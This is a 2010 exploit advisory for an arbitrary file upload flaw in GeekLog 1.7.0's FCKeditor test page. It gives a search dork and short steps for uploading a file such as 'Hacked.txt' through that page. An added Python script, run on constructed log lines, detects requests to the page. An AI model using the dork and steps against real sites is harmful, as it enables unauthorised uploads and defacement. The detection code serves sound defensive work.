GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability

2010-10-18 19:15:06

###################################################
#
# Exploit Title: Geeklog
# Date: 18-10-2010
# Author: Kubanezi AHG
# Software Link: http://www.geeklog.net/
# Version: 1.7.0
# Tested on: Linux Ubuntu 9.04
# dork : inurl:"/geeklog/"
# Contact: [email protected]
#
####################################################

exploit # geeklog/fckeditor/editor/filemanager/upload/test.html


first go to # http://site.com/Geeklog/


then # http://site.com/Geeklog/fckeditor/editor/filemanager/upload/test.html

select # "php"


Upload Hacked.txt there and copy the output link

#######################################################
Exploit By Kubanezi
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Greetz: AHG-Crew, Mistreriozi, Boom, Twilight, AutoruN, DoctorSQl, Drake, Dj-Dukli, EragoN, Khaled, MossaD, BH-TREX
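
The requests in the steps above leave a recognisable trace in web server access logs. The following is an added detection example, not part of the original advisory: it flags requests for the upload test page and any POST beneath the same directory. The combined log format is an assumption, and the log lines, IP addresses and the POST target path in the sample are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Directory and test page are the paths named in the advisory.
UPLOAD_DIR = "/fckeditor/editor/filemanager/upload/"
TEST_PAGE = UPLOAD_DIR + "test.html"

# Assumption: Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_upload_activity(lines):
    """Return {client_ip: [(timestamp, finding, raw_path), ...]}."""
    findings = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Normalise case and percent-encoding, drop the query string.
        path = unquote(m["path"].split("?", 1)[0]).lower()
        if UPLOAD_DIR not in path:
            continue
        ok = m["status"].startswith("2")
        if m["method"] == "GET" and path.endswith(TEST_PAGE):
            kind = "test-page-served" if ok else "test-page-probe"
        elif m["method"] == "POST":
            # 2xx only shows the handler ran, not that a file was stored.
            kind = "upload-handler-reached" if ok else "upload-post-blocked"
        else:
            continue
        findings[m["ip"]].append((m["ts"], kind, m["path"]))
    return dict(findings)

# Constructed sample log lines (documentation IP ranges, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Oct/2010:19:02:11 +0000] "GET /geeklog/ HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.10 - - [18/Oct/2010:19:02:40 +0000] "GET /Geeklog/fckeditor/editor/filemanager/upload/test.html HTTP/1.1" 200 2874 "-" "-"',
    '192.0.2.10 - - [18/Oct/2010:19:03:05 +0000] "POST /Geeklog/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 200 310 "-" "-"',
    '198.51.100.7 - - [18/Oct/2010:20:15:00 +0000] "GET /geeklog/fckeditor/editor/filemanager/upload/test.html HTTP/1.1" 404 210 "-" "-"',
    '203.0.113.5 - - [18/Oct/2010:21:00:00 +0000] "GET /geeklog/index.php HTTP/1.1" 200 4000 "-" "-"',
]

if __name__ == "__main__":
    for ip, hits in find_upload_activity(SAMPLE_LOG).items():
        for ts, kind, path in hits:
            print(f"{ts} {ip} {kind} {path}")
```

A `test-page-served` finding on its own means the test page is still reachable on the server and should be removed or access-restricted.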

Fixes

No fixes
